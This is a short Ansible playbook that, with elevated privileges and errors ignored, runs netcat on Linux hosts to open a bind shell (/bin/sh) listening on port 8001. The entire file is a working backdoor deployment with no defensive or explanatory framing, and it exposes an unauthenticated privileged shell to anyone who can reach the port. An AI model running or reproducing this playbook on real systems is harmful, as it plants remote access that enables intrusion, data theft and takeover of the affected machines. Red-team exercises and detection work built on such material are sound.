- name: bin shell
  hosts: linux
  become: true
  become_method: enable
  ignore_errors: true
  tasks:
    - name: bind shell
      shell: "nc -lvp {{ bind_shell_port }} -e /bin/sh"
      vars:
        bind_shell_port: 8001
